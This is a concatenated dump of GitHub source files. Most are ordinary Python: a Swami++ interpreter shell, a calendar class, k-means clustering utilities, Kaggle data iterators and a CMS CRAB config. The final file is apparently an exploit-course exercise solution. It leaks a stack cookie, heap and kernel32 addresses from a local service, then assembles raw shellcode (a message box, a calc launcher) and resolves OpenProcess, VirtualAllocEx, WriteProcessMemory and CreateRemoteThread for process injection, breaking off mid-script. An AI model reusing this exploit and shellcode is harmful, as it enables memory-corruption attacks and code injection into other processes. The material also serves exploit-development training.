875f21f2992805a22b91db7f9b8a250e83dcac74 | 882448f56a2152dcd5363ee3891a2ae49830067e | /Shell.py | e5908b8c5cf50e3abb5691ff3c8746f74495ddee | [] | no_license | cclauss/Swamipp | dc648832b16997c4fc93721bd1031db75ca54c1c | 81838bcb121c7f3152f49f6540633c3a37d85c36 | refs/heads/master | 2023-07-03T05:01:42.602170 | 2020-09-05T15:27:48 | 2020-09-05T15:27:48 | 293,207,105 | 0 | 0 | null | 2020-09-06T05:03:13 | 2020-09-06T05:03:12 | null | UTF-8 | Python | false | false | 3,037 | py | import Swamipp as Swami
import os,datetime
import _thread, sys
import argparse
parser = argparse.ArgumentParser(description="Swami++")
parser.add_argument("file",nargs="?",type=str,help="file to be executed",default="")
args=parser.parse_args()
if args.file:
try:
code=open(args.file,"r").read()
y=datetime.datetime.now()
result,error=Swami.run(args.file,code)
x=datetime.datetime.now()
if error:
print(error.toString(),sep="\n")
else:
print(f"\nExecuted with zero errors in {(x-y).total_seconds()} seconds")
except KeyboardInterrupt:
sys.exit()
except Exception as e:
print("Could not find file, or fatal error...",e)
sys.exit()
def begin(s,r):
return s[:len(r)]==r
print("Swami++ 2.1.2, type credits for more info")
directory="C:/Swamipp/Programs/"
def notepad(f):
os.system("notepad.exe "+directory+f)
return
while 1:
command=input(">>> ")
if command=="exit":
break
elif command=="credits":
print("Developed By ClackHack, inspired by CodePulse")
elif begin(command,"file "):
f=command.replace("file ","")
try:
open(directory+f,"r").read()
except:
open(directory+f,"w").write("")
_thread.start_new_thread(notepad,(f,))
#os.system("notepad.exe Programs/"+f)
elif begin(command,"run "):
f = command.replace("run ","")
try:
code=open(directory+f,"r").read()
y=datetime.datetime.now()
result,error=Swami.run(f,code)
x=datetime.datetime.now()
if error:
print(error.toString(),sep="\n")
else:
print(f"\nExecuted with zero errors in {(x-y).total_seconds()} seconds")
except KeyboardInterrupt:
continue
except Exception as e:
print("Could not find file, or fatal error...",e)
elif command=="repl":
while 1:
text=input("Swami++ > ")
if text.strip()=="":
continue
if text=="exit":
break
try:
result,error=Swami.run("<Shell>",text)
except KeyboardInterrupt:
continue
if error:
print(error.toString())
elif result:
if len(result.elements)==1:
print(repr(result.elements[0]))
else:
for i in result.elements:
print(repr(i))
elif command=="programs":
f=os.listdir(directory.strip("/"))
for p in f:
print(p)
elif begin(command,"delete"):
f = command.replace("delete ","").strip()
try:
os.remove(directory+f)
except:
print("The file you specified was not found...")
elif command=="help":
print("Commands are file, run, programs, delete, repl, and exit\nCheck the github page for syntax support")
else:
print("Unkown command...\ntype help for help... ")
| [
"48455071+ClackHack@users.noreply.github.com"
] | 48455071+ClackHack@users.noreply.github.com |
a9a03fa3c380ea00731a5dce56c784abd1cc7440 | 20b1277d0254b89bfe415416a7b00b3fc78f4e6c | /calendar.py | a5e40f5067ce308d2fa0b6741f58173eb2abdf8b | [] | no_license | parasjitaliya/DataStructurePrograms | f9f20e21234e514f8bb83de6f58a557a56533366 | d09041a4ab00da9138ac1ca92db187615bc956c4 | refs/heads/master | 2021-01-07T02:46:03.410541 | 2020-02-24T07:42:58 | 2020-02-24T07:42:58 | 241,556,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | class Calendar:
def calender(self, month, day, year):
# assigning the year and month values to variable
y0 = year - (14 - month) // 12
x = y0 + y0 // 4 - y0 // 100 + y0 // 400
m0 = month + 12 * ((14 - month) // 12) - 2
d0 = int((day + x + (31 * m0 // 12))) % 7
# days = {0: "Sunday", 1: "Monday", 2: "Tuesday", 3: "Wednesday", 4: "Thursday", 5: "Friday", 6: "Saturday"}
# return the value
return d0
# assign the day for month
def days(self, month,year):
if month in (1, 3, 5, 7, 8, 10, 12):
return 31
elif month in (4, 6, 9, 11):
return 30
elif month == 2:
# function calling for leap year
if Calendar.leap_year(self, year):
return 29
else:
return 28
# check the year is leap year or not
def leap_year(self,year):
return (((year % 4 == 0) and (year % 100 != 0)) or (year % 400 == 0))
# create the function for print calander
def print_calander(self, month, day, year):
# function call for day
remainder = Calendar.calender(self, month, day, year)
for date in range(0, remainder):
print(end=" ")
# function calll for the day
lastdate = Calendar.days(self, month, year)
for date in range(1, lastdate+1):
# check the condition for day less than 10
if date < 10:
print(f" {date}", end=" ")
else:
print(date, end=" ")
# calculate for space
space = (date + remainder) % 7
if space is 0 or date is lastdate:
print("") | [
"parasjitaliya@gmail.com"
] | parasjitaliya@gmail.com |
c1136a5987a63ebf2de45eff64448bbd8fb0ce61 | fe2b1fff2e6a2eabdcb722fc9b4f0ff85413e228 | /Capstone2_MelanieM/website-final/virt/bin/f2py3 | 42d5199a7742cf2fccf514e4547ce7e23d9753be | [] | no_license | mmalinas/Springboard_Git | 2c2c4ec7389bf4ecc495a9a84e12ce0fe76a492d | 2dc7563b33867ebeb7bcc45d550001471b73b618 | refs/heads/master | 2022-12-10T06:20:41.520715 | 2019-11-13T00:21:50 | 2019-11-13T00:21:50 | 197,436,074 | 0 | 1 | null | 2022-12-08T07:31:38 | 2019-07-17T17:43:16 | Python | UTF-8 | Python | false | false | 303 | #!/Users/melaniemalinas/Documents/Springboard/Springboard_Git/Capstone2_MelanieM/website2/virt/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"melaniemalinas@melanie-malinass-macbook.local"
] | melaniemalinas@melanie-malinass-macbook.local | |
4a659b8042ba74a94c18b7b2402f9afc3af4bd3b | eb1c205ccbfe05b1ed6f21e97320ad3d16b1e6ac | /skmeans_utils.py | 586750fc4cdcb14f00edd273dc8b60ed0f08a65d | [] | no_license | thevishalagarwal/IncrementalSKMeans | e946778fa6c3a63c3ce17cbdafbee6d3ffa4bd3a | bd153d2bf5c221905edd9dbacc9e2fce100aff89 | refs/heads/master | 2021-05-07T05:55:35.609400 | 2017-11-29T08:12:08 | 2017-11-29T08:12:08 | 111,684,033 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,747 | py | import cPickle
import gzip
import numpy as np
from matplotlib import pyplot as plt
def normalize(x):
return x / np.sqrt(np.sum(x**2, axis=0))
def showImage(img):
img = img.reshape((28,28))
plt.imshow(img, cmap='gray')
plt.show()
def angleBetweenVectors(x1, x2):
a = np.arccos(np.dot(x1.T,x2))
return a*180/np.pi
def weightedSum(x1, x2, w1, w2):
return (w1*x1+w2*x2)/(w1+w2)
def getMembership(x, sigma):
return np.exp(-0.5*((x*1.0/sigma)**2))
def appendVector(x1, x2):
x1 = np.column_stack((x1, x2))
return x1
def combineClusters(cluster, i, j):
cluster['mu'][:, i] = weightedSum(cluster['mu'][:, i], cluster['mu'][:, j], cluster['pi_weight'][:, i], cluster['pi_weight'][:, j])
cluster['mu_theta'][:, i] = weightedSum(cluster['mu_theta'][:, i], cluster['mu_theta'][:, j], cluster['pi_weight'][:, i], cluster['pi_weight'][:, j])
cluster['sigma_theta'][:, i] = weightedSum(cluster['sigma_theta'][:, i], cluster['sigma_theta'][:, j], cluster['pi_weight'][:, i], cluster['pi_weight'][:, j])
cluster['pi_weight'][:, i] += cluster['pi_weight'][:, j]
cluster['mu'] = np.delete(cluster['mu'], j, axis=1)
cluster['mu_theta'] = np.delete(cluster['mu_theta'], j, axis=1)
cluster['sigma_theta'] = np.delete(cluster['sigma_theta'], j, axis=1)
cluster['pi_weight'] = np.delete(cluster['pi_weight'], j, axis=1)
cluster['mu'] = normalize(cluster['mu'])
return cluster
def loadData():
f = gzip.open('mnist.pkl.gz', 'rb')
x, _, _ = cPickle.load(f)
X = x[0]
X = X.T # X.shape = (784, 50000)
np.random.shuffle(X.T)
X = normalize(X)
return X
def newCluster(cluster, X, theta):
cluster['mu'] = appendVector(cluster['mu'], X)
cluster['mu_theta'] = appendVector(cluster['mu_theta'], np.mean(theta))
cluster['sigma_theta'] = appendVector(cluster['sigma_theta'], abs(np.std(theta)))
cluster['pi_weight'] = appendVector(cluster['pi_weight'], np.array([[1.0]]))
cluster['mu'] = normalize(cluster['mu'])
return cluster
def addToCluster(cluster, X, num_cluster, k, beta, gamma):
mu = cluster['mu']
muTheta = cluster['mu_theta']
sigmaTheta = cluster['sigma_theta']
pi = cluster['pi_weight']
theta = angleBetweenVectors(X, mu)
# Get Host Clusters
host_cluster = abs(theta) < abs( muTheta + k*sigmaTheta )
host = host_cluster[0, :]
# No host cluster => Create new cluster
if np.all(~host_cluster) == True:
num_cluster += 1
return newCluster(cluster, X, theta), num_cluster
# Get Membership Values
membrship_host = getMembership(theta[:, host], sigmaTheta[:, host])
alpha = membrship_host/(np.sum(membrship_host, keepdims=True))
# Update Cluster parameters
mu[:, host] = (1-alpha)* mu[:, host] + X
muTheta[:, host] = (1 - beta)*muTheta[0, host] + beta*theta[:, host]
sigmaTheta[:, host] = np.sqrt(abs((1-beta)*(sigmaTheta[:, host]**2 + beta*(theta[:, host] - muTheta[:, host])**2)))
pi[:, host] = (1 - gamma*alpha)*pi[:, host] + gamma*alpha
# Penalize non-host clusters
pi[:,~host] -= gamma
mu = normalize(mu) #normalize mean vector
cluster['mu'] = mu
cluster['mu_theta'] = muTheta
cluster['sigma_theta'] = sigmaTheta
cluster['pi_weight'] = pi
return cluster, num_cluster
def mergeCluster(cluster, num_cluster, merge_threshold):
mu = cluster['mu']
muTheta = cluster['mu_theta']
sigmaTheta = cluster['sigma_theta']
pi = cluster['pi_weight']
for j in range(num_cluster-1):
for k in range(j+1, num_cluster-1):
phi = angleBetweenVectors( mu[:, j], mu[:, k] )
if ( (phi/2)*(1/sigmaTheta[0,j] + 1/sigmaTheta[0,k]) ) < merge_threshold:
cluster = skutil.combineClusters(cluster, j, k)
num_cluster -= 1
mu = normalize(mu)
cluster['mu'] = mu
cluster['mu_theta'] = muTheta
cluster['sigma_theta'] = sigmaTheta
cluster['pi_weight'] = pi
return cluster, num_cluster | [
"noreply@github.com"
] | thevishalagarwal.noreply@github.com |
d60ad3880d7c6e574a14889e96134d03ea0cf5a7 | 54fdaa05078261180cbd7cc94c132527725b189d | /test/crab_ElectronPlots_newskim_eraBv2.py | 3669634ae8acc57d136ad537adca62dd18a27724 | [] | no_license | psiddire/ZeeAnalyzer | e488d3b65108ca923bd459cda41e61f3bd746a5b | d94b1fd4f4de19f5cdeaf405e4c0d6629b889888 | refs/heads/master | 2021-09-07T12:20:36.554253 | 2018-02-22T18:31:52 | 2018-02-22T18:31:52 | 113,574,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | # from https://twiki.cern.ch/twiki/bin/view/CMSPublic/WorkBookCRAB3Tutorial
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'plots_Zee_newskim_eraBv2'
config.General.workArea = 'crab_projects'
config.General.transferOutputs = True
config.General.transferLogs = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'runElectronPlots_newSkim_v2.py'
config.Data.inputDataset = '/DoubleEG/Run2017B-PromptReco-v2/MINIAOD'
config.Data.inputDBS = 'global'
config.Data.splitting = 'LumiBased'
config.Data.unitsPerJob = 1000
config.Data.lumiMask = 'NewJson.txt'
config.Data.runRange = '297050-299329'
#config.Data.totalUnits = 1
config.Data.outLFNDirBase = '/store/user/%s/' % (getUsernameFromSiteDB())
config.Data.publication = True
config.Data.outputDatasetTag = 'Zee_ElectronPlots_newskim_eraBv2'
config.Site.storageSite = 'T2_CH_CERN'
#all the configuration parameters https://twiki.cern.ch/twiki/bin/view/CMSPublic/CRAB3ConfigurationFile
#all crab commands https://twiki.cern.ch/twiki/bin/view/CMSPublic/CRAB3Commands
| [
"psiddire@nd.edu"
] | psiddire@nd.edu |
1b90511986a531459e5946949c883716a0400749 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories/267667/kaggle-heart-master/ira/data_iterators.py | cf51b09e680a9c57f815dfc6f35d04a33d7f6edb | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,976 | py | import data
import glob
import re
import itertools
from collections import defaultdict
import numpy as np
import utils
class SliceNormRescaleDataGenerator(object):
def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
slice2roi_path=None, full_batch=False, random=True, infinite=False, view='sax',
data_prep_fun=data.transform_norm_rescale, **kwargs):
if patient_ids:
self.patient_paths = []
for pid in patient_ids:
self.patient_paths.append(data_path + '/%s/study/' % pid)
else:
self.patient_paths = glob.glob(data_path + '/*/study/')
self.slice_paths = [sorted(glob.glob(p + '/%s_*.pkl' % view)) for p in self.patient_paths]
self.slice_paths = list(itertools.chain(*self.slice_paths))
self.slicepath2pid = {}
for s in self.slice_paths:
self.slicepath2pid[s] = int(utils.get_patient_id(s))
self.nsamples = len(self.slice_paths)
self.batch_size = batch_size
self.rng = np.random.RandomState(42)
self.full_batch = full_batch
self.random = random
self.infinite = infinite
self.id2labels = data.read_labels(labels_path) if labels_path else None
self.transformation_params = transform_params
self.data_prep_fun = data_prep_fun
self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
def generate(self):
while True:
rand_idxs = np.arange(self.nsamples)
if self.random:
self.rng.shuffle(rand_idxs)
for pos in xrange(0, len(rand_idxs), self.batch_size):
idxs_batch = rand_idxs[pos:pos + self.batch_size]
nb = len(idxs_batch)
# allocate batch
x_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'], dtype='float32')
y0_batch = np.zeros((nb, 1), dtype='float32')
y1_batch = np.zeros((nb, 1), dtype='float32')
patients_ids = []
for i, j in enumerate(idxs_batch):
slicepath = self.slice_paths[j]
patient_id = self.slicepath2pid[slicepath]
patients_ids.append(patient_id)
slice_roi = self.slice2roi[str(patient_id)][
utils.get_slice_id(slicepath)] if self.slice2roi else None
slice_data = data.read_slice(slicepath)
metadata = data.read_metadata(slicepath)
x_batch[i], targets_zoom = self.data_prep_fun(slice_data, metadata, self.transformation_params,
roi=slice_roi)
if self.id2labels:
y0_batch[i] = self.id2labels[patient_id][0] * targets_zoom
y1_batch[i] = self.id2labels[patient_id][1] * targets_zoom
if self.full_batch:
if nb == self.batch_size:
yield [x_batch], [y0_batch, y1_batch], patients_ids
else:
yield [x_batch], [y0_batch, y1_batch], patients_ids
if not self.infinite:
break
class PatientsDataGenerator(object):
def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
slice2roi_path=None, full_batch=False, random=True, infinite=True, min_slices=0,
data_prep_fun=data.transform_norm_rescale,
**kwargs):
if patient_ids:
patient_paths = []
for pid in patient_ids:
patient_paths.append(data_path + '/%s/study/' % pid)
else:
patient_paths = glob.glob(data_path + '/*/study/')
self.pid2slice_paths = defaultdict(list)
nslices = []
for p in patient_paths:
pid = int(utils.get_patient_id(p))
spaths = sorted(glob.glob(p + '/sax_*.pkl'), key=lambda x: int(re.search(r'/sax_(\d+)\.pkl$', x).group(1)))
# consider patients only with min_slices
if len(spaths) > min_slices:
self.pid2slice_paths[pid] = spaths
nslices.append(len(spaths))
# take max number of slices
self.nslices = int(np.max(nslices))
self.patient_ids = self.pid2slice_paths.keys()
self.nsamples = len(self.patient_ids)
self.data_path = data_path
self.id2labels = data.read_labels(labels_path) if labels_path else None
self.batch_size = batch_size
self.rng = np.random.RandomState(42)
self.full_batch = full_batch
self.random = random
self.batch_size = batch_size
self.infinite = infinite
self.transformation_params = transform_params
self.data_prep_fun = data_prep_fun
self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
def generate(self):
while True:
rand_idxs = np.arange(self.nsamples)
if self.random:
self.rng.shuffle(rand_idxs)
for pos in xrange(0, len(rand_idxs), self.batch_size):
idxs_batch = rand_idxs[pos:pos + self.batch_size]
nb = len(idxs_batch)
# allocate batches
x_batch = np.zeros((nb, self.nslices, 30) + self.transformation_params['patch_size'],
dtype='float32')
sex_age_batch = np.zeros((nb, 2), dtype='float32')
slice_location_batch = np.zeros((nb, self.nslices, 1), dtype='float32')
slice_mask_batch = np.zeros((nb, self.nslices), dtype='float32')
y0_batch = np.zeros((nb, 1), dtype='float32')
y1_batch = np.zeros((nb, 1), dtype='float32')
patients_ids = []
for i, idx in enumerate(idxs_batch):
pid = self.patient_ids[idx]
patients_ids.append(pid)
slice_paths = self.pid2slice_paths[pid]
# fill metadata dict for linefinder code and sort slices
slicepath2metadata = {}
for sp in slice_paths:
slicepath2metadata[sp] = data.read_metadata(sp)
slicepath2location = data.slice_location_finder(slicepath2metadata)
slice_paths = sorted(slicepath2location.keys(), key=slicepath2location.get)
# sample augmentation params per patient
random_params = data.sample_augmentation_parameters(self.transformation_params)
for j, sp in enumerate(slice_paths):
slice_roi = self.slice2roi[str(pid)][
utils.get_slice_id(sp)] if self.slice2roi else None
slice_data = data.read_slice(sp)
x_batch[i, j], targets_zoom = self.data_prep_fun(slice_data, slicepath2metadata[sp],
self.transformation_params,
roi=slice_roi,
random_augmentation_params=random_params)
slice_location_batch[i, j] = slicepath2location[sp]
slice_mask_batch[i, j] = 1.
sex_age_batch[i, 0] = slicepath2metadata[slice_paths[0]]['PatientSex']
sex_age_batch[i, 1] = slicepath2metadata[slice_paths[0]]['PatientAge']
if self.id2labels:
y0_batch[i] = self.id2labels[pid][0] * targets_zoom
y1_batch[i] = self.id2labels[pid][1] * targets_zoom
if self.full_batch:
if nb == self.batch_size:
yield [x_batch, slice_mask_batch, slice_location_batch, sex_age_batch], [y0_batch,
y1_batch], patients_ids
else:
yield [x_batch, slice_mask_batch, slice_location_batch, sex_age_batch], [y0_batch,
y1_batch], patients_ids
if not self.infinite:
break
class Ch2Ch4DataGenerator(object):
def __init__(self, data_path, batch_size, transform_params, patient_ids=None, labels_path=None,
slice2roi_path=None, full_batch=False, random=True, infinite=True, min_slices=5, **kwargs):
if patient_ids:
patient_paths = []
for pid in patient_ids:
patient_paths.append(data_path + '/%s/study/' % pid)
else:
patient_paths = glob.glob(data_path + '/*/study/')
self.pid2sax_slice_paths = defaultdict(list)
self.pid2ch2_path, self.pid2ch4_path = {}, {}
for p in patient_paths:
pid = int(utils.get_patient_id(p))
spaths = sorted(glob.glob(p + '/sax_*.pkl'), key=lambda x: int(re.search(r'/sax_(\d+)\.pkl$', x).group(1)))
if len(spaths) > min_slices:
self.pid2sax_slice_paths[pid] = spaths
ch2_path = glob.glob(p + '/2ch_*.pkl')
self.pid2ch2_path[pid] = ch2_path[0] if ch2_path else None
ch4_path = glob.glob(p + '/4ch_*.pkl')
self.pid2ch4_path[pid] = ch4_path[0] if ch4_path else None
self.patient_ids = self.pid2sax_slice_paths.keys()
self.nsamples = len(self.patient_ids)
self.id2labels = data.read_labels(labels_path) if labels_path else None
self.batch_size = batch_size
self.rng = np.random.RandomState(42)
self.full_batch = full_batch
self.random = random
self.batch_size = batch_size
self.infinite = infinite
self.transformation_params = transform_params
self.slice2roi = utils.load_pkl(slice2roi_path) if slice2roi_path else None
def generate(self):
while True:
rand_idxs = np.arange(self.nsamples)
if self.random:
self.rng.shuffle(rand_idxs)
for pos in xrange(0, len(rand_idxs), self.batch_size):
idxs_batch = rand_idxs[pos:pos + self.batch_size]
nb = len(idxs_batch)
# allocate batches
x_ch2_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'],
dtype='float32')
x_ch4_batch = np.zeros((nb, 30) + self.transformation_params['patch_size'],
dtype='float32')
y0_batch = np.zeros((nb, 1), dtype='float32')
y1_batch = np.zeros((nb, 1), dtype='float32')
patients_ids = []
for i, idx in enumerate(idxs_batch):
pid = self.patient_ids[idx]
patients_ids.append(pid)
# do everything with sax
sax_slice_paths = self.pid2sax_slice_paths[pid]
sax_slicepath2metadata = {}
sax_slicepath2roi = {}
for s in sax_slice_paths:
sax_metadata = data.read_metadata(s)
sax_slicepath2metadata[s] = sax_metadata
sid = utils.get_slice_id(s)
roi = self.slice2roi[str(pid)][sid]
sax_slicepath2roi[s] = roi
# read ch2, ch4
if self.pid2ch2_path[pid]:
data_ch2 = data.read_slice(self.pid2ch2_path[pid])
metadata_ch2 = data.read_metadata(self.pid2ch2_path[pid])
else:
data_ch2, metadata_ch2 = None, None
if self.pid2ch4_path[pid]:
data_ch4 = data.read_slice(self.pid2ch4_path[pid])
metadata_ch4 = data.read_metadata(self.pid2ch4_path[pid])
else:
data_ch4, metadata_ch4 = None, None
if data_ch2 is None and data_ch4 is not None:
data_ch2 = data_ch4
if data_ch4 is None and data_ch2 is not None:
data_ch4 = data_ch2
# sample augmentation params per patient
random_params = data.sample_augmentation_parameters(self.transformation_params)
x_ch2_batch[i], x_ch4_batch[i], targets_zoom = data.transform_ch(data_ch2, metadata_ch2,
data_ch4, metadata_ch4,
saxslice2metadata=sax_slicepath2metadata,
transformation=self.transformation_params,
sax2roi=sax_slicepath2roi,
random_augmentation_params=random_params)
if self.id2labels:
y0_batch[i] = self.id2labels[pid][0] * targets_zoom
y1_batch[i] = self.id2labels[pid][1] * targets_zoom
if self.full_batch:
if nb == self.batch_size:
yield [x_ch2_batch, x_ch4_batch], [y0_batch, y1_batch], patients_ids
else:
yield [x_ch2_batch, x_ch4_batch], [y0_batch, y1_batch], patients_ids
if not self.infinite:
break
| [
"keesiu.wong@gmail.com"
] | keesiu.wong@gmail.com |
d7b6b9885167a93f16a840f3c754138d408cbf89 | ee2bf52e37e23ea3030da212beb484319a35ed80 | /2015-2016 Nivel Basico/16_ejercicio16/Ejercicio16.py | 4e2874414e60ade932b0e3facb14bf2c7d454533 | [] | no_license | Trietptm-on-Coding-Algorithms/CLS-Exploits | 318fde8c3817fc6cf7e81ddf392f5eeac1f5c898 | 94ea56cf51fcd89330c0d93e62d5f3d905e5e602 | refs/heads/master | 2020-03-20T19:15:58.696676 | 2016-08-28T11:02:32 | 2016-08-28T11:02:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,482 | py | import socket, struct, binascii, array, time
from nutshell import *
p = lambda x : struct.pack ("<I", x)
u = lambda x : struct.unpack ("<I", x)
signedHex = lambda val, nbits : hex ((val + (1 << nbits)) % (1 << nbits))
def littleE2Hex (x):
val = binascii.unhexlify (x.encode ("hex") )
y = array.array ('h', val)
y.byteswap ()
return u (val)[0]
kernel32_offset = {"b62f" : 0x52fb6, "dfa3" : 0xe547}
user = "pepe choto\x00"
s = socket.create_connection ( ("127.0.0.1", 27015) )
print "[+] sending user credentials"
s.send (user + "\x00"*(0x200 - len(user)))
# \xf48
for i in range (7):
print "[!] counter %d" % i
if i == 0:
buf = s.recv (15)
cookie = buf[:4]
print " [*] cookie: 0x%04x " % littleE2Hex(cookie)
else:
buf = s.recv(40)
if i == 1:
heap = littleE2Hex(buf[:4])
print "[!] LEAK heap address: 0x%x" % heap
egg_heap = heap + 0x907
print " heap chunk predicted at 0x%x" % egg_heap
if i == 2:
virtualAlloc = littleE2Hex (buf[20:24])
kernelBase = virtualAlloc - kernel32_offset[buf[20:22].encode("hex")]
malloc = littleE2Hex (buf[24:28])
print "[!] LEAKS\n virtualloc:0x%x, malloc:0x%x, kernel32:0x%x" % (virtualAlloc, malloc, kernelBase)
if i == 0:
s.send(cookie + p(0x1) + p(0x1) + "\x90" *(0x200 - (8 + len(cookie))))
s.send("A"*2)
if i == 1:
s.send(cookie + p(0x30) + p(0x10) + "\x90" *(0x200 - (8 + len(cookie))))
s.send("A"*(0x40))
if i == 2:
s.send(cookie + p(0x30) + p(0x857) + "\x90" *(0x200 - (8 + len(cookie))))
s.send(cookie + "B"*(0x30 - len(cookie)))
s.send(cookie + "C"*(0x857 - len(cookie)))
if i == 3:
calc = "calc.exe"
user = "user32.dll"
user += "\x00"*(12 - len(user))
FWindow = "FindWindowA"
FWindow += "\x00"*(12 - len(FWindow))
GetPid = "GetWindowThreadProcessId"
GetPid += "\x00"*(28 - len(GetPid))
Open = "OpenProcess"
Open += "\x00"*(12 - len(Open))
VallocEx = "VirtualAllocEx"
VallocEx += "\x00"*(16 - len(VallocEx))
Write = "WriteProcessMemory"
Write += "\x00"*(20 - len(Write))
Create = "CreateRemoteThread"
Create += "\x00"*(20 - len(Create))
ExitProcess = "ExitProcess\x00"
egg = Nutshell("x86", 0)
sc_msgbox = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
sc_msgbox += "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
sc_msgbox += "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
sc_msgbox += "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
sc_msgbox += "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
sc_msgbox += "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
sc_msgbox += "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
sc_msgbox += "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
sc_msgbox += "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
sc_msgbox += "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
sc_msgbox += "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
sc_msgbox += "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
sc_msgbox += "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
sc_msgbox += "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
sc_msgbox += "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
sc_msgbox += "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
sc_msgbox += "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
sc_msgbox += "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
sc_msgbox += "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
sc_msgbox += "\x2C\x57\x68\x43\x4C\x53\x21\x8B\xDC\x57"
sc_msgbox += "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
sc_msgbox += "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
sc_msgbox += "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
sc_msgbox += "\x40\xFF\x54\x24\x40\x57\xFF\xD0"
execalc = "\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
execalc += "\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
execalc += "\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
execalc += "\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
execalc += "\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\x90"
shellcode = execalc
shellcode += egg.nut_revolve("esi", "ebx") # esi = GetProcAddress, ebx = GetModuleHandle
shellcode += egg.nut_asm("push 0x%s" % user[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % user[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % user[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov edi, eax") # edi = module handle user32.dll
shellcode += egg.nut_asm("add esp, 0xC")
shellcode += egg.nut_asm("push 0x%s" % FWindow[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % FWindow[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % FWindow[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 4], eax") #FindWindow
shellcode += egg.nut_asm("push 0x%s" % GetPid[24:28][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[20:24][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % GetPid[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 8], eax") #GetWindowThreadProcessId
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % ExitProcess[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 12], eax") #ExitProcess
shellcode += egg.nut_asm("push 0x%s" % VallocEx[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % VallocEx[:4][::-1].encode("hex"))
